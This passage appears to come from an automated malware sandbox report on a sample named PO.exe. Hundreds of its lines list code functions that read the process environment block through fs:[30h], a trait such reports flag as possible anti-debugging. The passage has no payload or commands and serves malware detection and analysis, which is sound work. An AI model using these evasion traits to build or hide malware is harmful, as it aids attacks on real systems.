                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EA197 mov eax, dword ptr fs:[00000030h]2_2_016EA197
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01794180 mov eax, dword ptr fs:[00000030h]2_2_01794180
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01794180 mov eax, dword ptr fs:[00000030h]2_2_01794180
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171C073 mov eax, dword ptr fs:[00000030h]2_2_0171C073
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01776050 mov eax, dword ptr fs:[00000030h]2_2_01776050
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F2050 mov eax, dword ptr fs:[00000030h]2_2_016F2050
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01786030 mov eax, dword ptr fs:[00000030h]2_2_01786030
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EA020 mov eax, dword ptr fs:[00000030h]2_2_016EA020
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EC020 mov eax, dword ptr fs:[00000030h]2_2_016EC020
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170E016 mov eax, dword ptr fs:[00000030h]2_2_0170E016
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170E016 mov eax, dword ptr fs:[00000030h]2_2_0170E016
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170E016 mov eax, dword ptr fs:[00000030h]2_2_0170E016
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170E016 mov eax, dword ptr fs:[00000030h]2_2_0170E016
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01774000 mov ecx, dword ptr fs:[00000030h]2_2_01774000
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01792000 mov eax, dword ptr fs:[00000030h]2_2_01792000
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01792000 mov eax, dword ptr fs:[00000030h]2_2_01792000
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01792000 mov eax, dword ptr fs:[00000030h]2_2_01792000
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01792000 mov eax, dword ptr fs:[00000030h]2_2_01792000
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01792000 mov eax, dword ptr fs:[00000030h]2_2_01792000
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01792000 mov eax, dword ptr fs:[00000030h]2_2_01792000
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01792000 mov eax, dword ptr fs:[00000030h]2_2_01792000
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01792000 mov eax, dword ptr fs:[00000030h]2_2_01792000
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017320F0 mov ecx, dword ptr fs:[00000030h]2_2_017320F0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F80E9 mov eax, dword ptr fs:[00000030h]2_2_016F80E9
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EA0E3 mov ecx, dword ptr fs:[00000030h]2_2_016EA0E3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017760E0 mov eax, dword ptr fs:[00000030h]2_2_017760E0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EC0F0 mov eax, dword ptr fs:[00000030h]2_2_016EC0F0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017720DE mov eax, dword ptr fs:[00000030h]2_2_017720DE
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B60B8 mov eax, dword ptr fs:[00000030h]2_2_017B60B8
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B60B8 mov ecx, dword ptr fs:[00000030h]2_2_017B60B8
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017880A8 mov eax, dword ptr fs:[00000030h]2_2_017880A8
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F208A mov eax, dword ptr fs:[00000030h]2_2_016F208A
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179437C mov eax, dword ptr fs:[00000030h]2_2_0179437C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017BA352 mov eax, dword ptr fs:[00000030h]2_2_017BA352
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01798350 mov ecx, dword ptr fs:[00000030h]2_2_01798350
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177035C mov eax, dword ptr fs:[00000030h]2_2_0177035C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177035C mov eax, dword ptr fs:[00000030h]2_2_0177035C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177035C mov eax, dword ptr fs:[00000030h]2_2_0177035C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177035C mov ecx, dword ptr fs:[00000030h]2_2_0177035C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177035C mov eax, dword ptr fs:[00000030h]2_2_0177035C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177035C mov eax, dword ptr fs:[00000030h]2_2_0177035C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01710310 mov ecx, dword ptr fs:[00000030h]2_2_01710310
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172A30B mov eax, dword ptr fs:[00000030h]2_2_0172A30B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172A30B mov eax, dword ptr fs:[00000030h]2_2_0172A30B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172A30B mov eax, dword ptr fs:[00000030h]2_2_0172A30B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EC310 mov ecx, dword ptr fs:[00000030h]2_2_016EC310
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170E3F0 mov eax, dword ptr fs:[00000030h]2_2_0170E3F0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170E3F0 mov eax, dword ptr fs:[00000030h]2_2_0170E3F0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170E3F0 mov eax, dword ptr fs:[00000030h]2_2_0170E3F0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017263FF mov eax, dword ptr fs:[00000030h]2_2_017263FF
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017003E9 mov eax, dword ptr fs:[00000030h]2_2_017003E9
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017003E9 mov eax, dword ptr fs:[00000030h]2_2_017003E9
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017003E9 mov eax, dword ptr fs:[00000030h]2_2_017003E9
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017003E9 mov eax, dword ptr fs:[00000030h]2_2_017003E9
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017003E9 mov eax, dword ptr fs:[00000030h]2_2_017003E9
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017003E9 mov eax, dword ptr fs:[00000030h]2_2_017003E9
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017003E9 mov eax, dword ptr fs:[00000030h]2_2_017003E9
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017003E9 mov eax, dword ptr fs:[00000030h]2_2_017003E9
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179E3DB mov eax, dword ptr fs:[00000030h]2_2_0179E3DB
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179E3DB mov eax, dword ptr fs:[00000030h]2_2_0179E3DB
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179E3DB mov ecx, dword ptr fs:[00000030h]2_2_0179E3DB
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179E3DB mov eax, dword ptr fs:[00000030h]2_2_0179E3DB
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017943D4 mov eax, dword ptr fs:[00000030h]2_2_017943D4
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017943D4 mov eax, dword ptr fs:[00000030h]2_2_017943D4
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA3C0 mov eax, dword ptr fs:[00000030h]2_2_016FA3C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA3C0 mov eax, dword ptr fs:[00000030h]2_2_016FA3C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA3C0 mov eax, dword ptr fs:[00000030h]2_2_016FA3C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA3C0 mov eax, dword ptr fs:[00000030h]2_2_016FA3C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA3C0 mov eax, dword ptr fs:[00000030h]2_2_016FA3C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA3C0 mov eax, dword ptr fs:[00000030h]2_2_016FA3C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F83C0 mov eax, dword ptr fs:[00000030h]2_2_016F83C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F83C0 mov eax, dword ptr fs:[00000030h]2_2_016F83C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F83C0 mov eax, dword ptr fs:[00000030h]2_2_016F83C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F83C0 mov eax, dword ptr fs:[00000030h]2_2_016F83C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017AC3CD mov eax, dword ptr fs:[00000030h]2_2_017AC3CD
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017763C0 mov eax, dword ptr fs:[00000030h]2_2_017763C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EE388 mov eax, dword ptr fs:[00000030h]2_2_016EE388
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EE388 mov eax, dword ptr fs:[00000030h]2_2_016EE388
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EE388 mov eax, dword ptr fs:[00000030h]2_2_016EE388
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016E8397 mov eax, dword ptr fs:[00000030h]2_2_016E8397
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016E8397 mov eax, dword ptr fs:[00000030h]2_2_016E8397
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016E8397 mov eax, dword ptr fs:[00000030h]2_2_016E8397
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171438F mov eax, dword ptr fs:[00000030h]2_2_0171438F
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171438F mov eax, dword ptr fs:[00000030h]2_2_0171438F
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016E826B mov eax, dword ptr fs:[00000030h]2_2_016E826B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A0274 mov eax, dword ptr fs:[00000030h]2_2_017A0274
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A0274 mov eax, dword ptr fs:[00000030h]2_2_017A0274
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A0274 mov eax, dword ptr fs:[00000030h]2_2_017A0274
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A0274 mov eax, dword ptr fs:[00000030h]2_2_017A0274
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A0274 mov eax, dword ptr fs:[00000030h]2_2_017A0274
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A0274 mov eax, dword ptr fs:[00000030h]2_2_017A0274
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A0274 mov eax, dword ptr fs:[00000030h]2_2_017A0274
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A0274 mov eax, dword ptr fs:[00000030h]2_2_017A0274
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A0274 mov eax, dword ptr fs:[00000030h]2_2_017A0274
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A0274 mov eax, dword ptr fs:[00000030h]2_2_017A0274
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A0274 mov eax, dword ptr fs:[00000030h]2_2_017A0274
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A0274 mov eax, dword ptr fs:[00000030h]2_2_017A0274
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F4260 mov eax, dword ptr fs:[00000030h]2_2_016F4260
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F4260 mov eax, dword ptr fs:[00000030h]2_2_016F4260
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F4260 mov eax, dword ptr fs:[00000030h]2_2_016F4260
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017AA250 mov eax, dword ptr fs:[00000030h]2_2_017AA250
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017AA250 mov eax, dword ptr fs:[00000030h]2_2_017AA250
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01778243 mov eax, dword ptr fs:[00000030h]2_2_01778243
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01778243 mov ecx, dword ptr fs:[00000030h]2_2_01778243
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F6259 mov eax, dword ptr fs:[00000030h]2_2_016F6259
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EA250 mov eax, dword ptr fs:[00000030h]2_2_016EA250
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016E823B mov eax, dword ptr fs:[00000030h]2_2_016E823B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017002E1 mov eax, dword ptr fs:[00000030h]2_2_017002E1
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017002E1 mov eax, dword ptr fs:[00000030h]2_2_017002E1
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017002E1 mov eax, dword ptr fs:[00000030h]2_2_017002E1
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA2C3 mov eax, dword ptr fs:[00000030h]2_2_016FA2C3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA2C3 mov eax, dword ptr fs:[00000030h]2_2_016FA2C3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA2C3 mov eax, dword ptr fs:[00000030h]2_2_016FA2C3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA2C3 mov eax, dword ptr fs:[00000030h]2_2_016FA2C3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA2C3 mov eax, dword ptr fs:[00000030h]2_2_016FA2C3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017002A0 mov eax, dword ptr fs:[00000030h]2_2_017002A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017002A0 mov eax, dword ptr fs:[00000030h]2_2_017002A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017862A0 mov eax, dword ptr fs:[00000030h]2_2_017862A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017862A0 mov ecx, dword ptr fs:[00000030h]2_2_017862A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017862A0 mov eax, dword ptr fs:[00000030h]2_2_017862A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017862A0 mov eax, dword ptr fs:[00000030h]2_2_017862A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017862A0 mov eax, dword ptr fs:[00000030h]2_2_017862A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017862A0 mov eax, dword ptr fs:[00000030h]2_2_017862A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01770283 mov eax, dword ptr fs:[00000030h]2_2_01770283
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01770283 mov eax, dword ptr fs:[00000030h]2_2_01770283
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01770283 mov eax, dword ptr fs:[00000030h]2_2_01770283
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172E284 mov eax, dword ptr fs:[00000030h]2_2_0172E284
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172E284 mov eax, dword ptr fs:[00000030h]2_2_0172E284
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172656A mov eax, dword ptr fs:[00000030h]2_2_0172656A
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172656A mov eax, dword ptr fs:[00000030h]2_2_0172656A
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172656A mov eax, dword ptr fs:[00000030h]2_2_0172656A
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F8550 mov eax, dword ptr fs:[00000030h]2_2_016F8550
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F8550 mov eax, dword ptr fs:[00000030h]2_2_016F8550
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700535 mov eax, dword ptr fs:[00000030h]2_2_01700535
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700535 mov eax, dword ptr fs:[00000030h]2_2_01700535
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700535 mov eax, dword ptr fs:[00000030h]2_2_01700535
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700535 mov eax, dword ptr fs:[00000030h]2_2_01700535
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700535 mov eax, dword ptr fs:[00000030h]2_2_01700535
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700535 mov eax, dword ptr fs:[00000030h]2_2_01700535
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E53E mov eax, dword ptr fs:[00000030h]2_2_0171E53E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E53E mov eax, dword ptr fs:[00000030h]2_2_0171E53E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E53E mov eax, dword ptr fs:[00000030h]2_2_0171E53E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E53E mov eax, dword ptr fs:[00000030h]2_2_0171E53E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E53E mov eax, dword ptr fs:[00000030h]2_2_0171E53E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01786500 mov eax, dword ptr fs:[00000030h]2_2_01786500
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017C4500 mov eax, dword ptr fs:[00000030h]2_2_017C4500
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017C4500 mov eax, dword ptr fs:[00000030h]2_2_017C4500
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017C4500 mov eax, dword ptr fs:[00000030h]2_2_017C4500
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017C4500 mov eax, dword ptr fs:[00000030h]2_2_017C4500
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017C4500 mov eax, dword ptr fs:[00000030h]2_2_017C4500
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017C4500 mov eax, dword ptr fs:[00000030h]2_2_017C4500
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017C4500 mov eax, dword ptr fs:[00000030h]2_2_017C4500
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F25E0 mov eax, dword ptr fs:[00000030h]2_2_016F25E0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E5E7 mov eax, dword ptr fs:[00000030h]2_2_0171E5E7
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E5E7 mov eax, dword ptr fs:[00000030h]2_2_0171E5E7
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E5E7 mov eax, dword ptr fs:[00000030h]2_2_0171E5E7
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E5E7 mov eax, dword ptr fs:[00000030h]2_2_0171E5E7
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E5E7 mov eax, dword ptr fs:[00000030h]2_2_0171E5E7
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E5E7 mov eax, dword ptr fs:[00000030h]2_2_0171E5E7
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E5E7 mov eax, dword ptr fs:[00000030h]2_2_0171E5E7
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E5E7 mov eax, dword ptr fs:[00000030h]2_2_0171E5E7
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172C5ED mov eax, dword ptr fs:[00000030h]2_2_0172C5ED
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172C5ED mov eax, dword ptr fs:[00000030h]2_2_0172C5ED
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172A5D0 mov eax, dword ptr fs:[00000030h]2_2_0172A5D0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172A5D0 mov eax, dword ptr fs:[00000030h]2_2_0172A5D0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172E5CF mov eax, dword ptr fs:[00000030h]2_2_0172E5CF
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172E5CF mov eax, dword ptr fs:[00000030h]2_2_0172E5CF
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F65D0 mov eax, dword ptr fs:[00000030h]2_2_016F65D0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017145B1 mov eax, dword ptr fs:[00000030h]2_2_017145B1
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017145B1 mov eax, dword ptr fs:[00000030h]2_2_017145B1
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017705A7 mov eax, dword ptr fs:[00000030h]2_2_017705A7
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017705A7 mov eax, dword ptr fs:[00000030h]2_2_017705A7
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017705A7 mov eax, dword ptr fs:[00000030h]2_2_017705A7
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F2582 mov eax, dword ptr fs:[00000030h]2_2_016F2582
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F2582 mov ecx, dword ptr fs:[00000030h]2_2_016F2582
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172E59C mov eax, dword ptr fs:[00000030h]2_2_0172E59C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01724588 mov eax, dword ptr fs:[00000030h]2_2_01724588
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171A470 mov eax, dword ptr fs:[00000030h]2_2_0171A470
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171A470 mov eax, dword ptr fs:[00000030h]2_2_0171A470
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171A470 mov eax, dword ptr fs:[00000030h]2_2_0171A470
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177C460 mov ecx, dword ptr fs:[00000030h]2_2_0177C460
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171245A mov eax, dword ptr fs:[00000030h]2_2_0171245A
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017AA456 mov eax, dword ptr fs:[00000030h]2_2_017AA456
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172E443 mov eax, dword ptr fs:[00000030h]2_2_0172E443
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172E443 mov eax, dword ptr fs:[00000030h]2_2_0172E443
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172E443 mov eax, dword ptr fs:[00000030h]2_2_0172E443
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172E443 mov eax, dword ptr fs:[00000030h]2_2_0172E443
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172E443 mov eax, dword ptr fs:[00000030h]2_2_0172E443
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172E443 mov eax, dword ptr fs:[00000030h]2_2_0172E443
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172E443 mov eax, dword ptr fs:[00000030h]2_2_0172E443
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172E443 mov eax, dword ptr fs:[00000030h]2_2_0172E443
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016E645D mov eax, dword ptr fs:[00000030h]2_2_016E645D
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EC427 mov eax, dword ptr fs:[00000030h]2_2_016EC427
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EE420 mov eax, dword ptr fs:[00000030h]2_2_016EE420
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EE420 mov eax, dword ptr fs:[00000030h]2_2_016EE420
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EE420 mov eax, dword ptr fs:[00000030h]2_2_016EE420
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01776420 mov eax, dword ptr fs:[00000030h]2_2_01776420
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01776420 mov eax, dword ptr fs:[00000030h]2_2_01776420
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01776420 mov eax, dword ptr fs:[00000030h]2_2_01776420
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01776420 mov eax, dword ptr fs:[00000030h]2_2_01776420
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01776420 mov eax, dword ptr fs:[00000030h]2_2_01776420
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01776420 mov eax, dword ptr fs:[00000030h]2_2_01776420
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01776420 mov eax, dword ptr fs:[00000030h]2_2_01776420
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01728402 mov eax, dword ptr fs:[00000030h]2_2_01728402
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01728402 mov eax, dword ptr fs:[00000030h]2_2_01728402
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01728402 mov eax, dword ptr fs:[00000030h]2_2_01728402
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F04E5 mov ecx, dword ptr fs:[00000030h]2_2_016F04E5
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017244B0 mov ecx, dword ptr fs:[00000030h]2_2_017244B0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F64AB mov eax, dword ptr fs:[00000030h]2_2_016F64AB
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177A4B0 mov eax, dword ptr fs:[00000030h]2_2_0177A4B0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017AA49A mov eax, dword ptr fs:[00000030h]2_2_017AA49A
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700770 mov eax, dword ptr fs:[00000030h]2_2_01700770
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700770 mov eax, dword ptr fs:[00000030h]2_2_01700770
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700770 mov eax, dword ptr fs:[00000030h]2_2_01700770
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700770 mov eax, dword ptr fs:[00000030h]2_2_01700770
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700770 mov eax, dword ptr fs:[00000030h]2_2_01700770
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700770 mov eax, dword ptr fs:[00000030h]2_2_01700770
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700770 mov eax, dword ptr fs:[00000030h]2_2_01700770
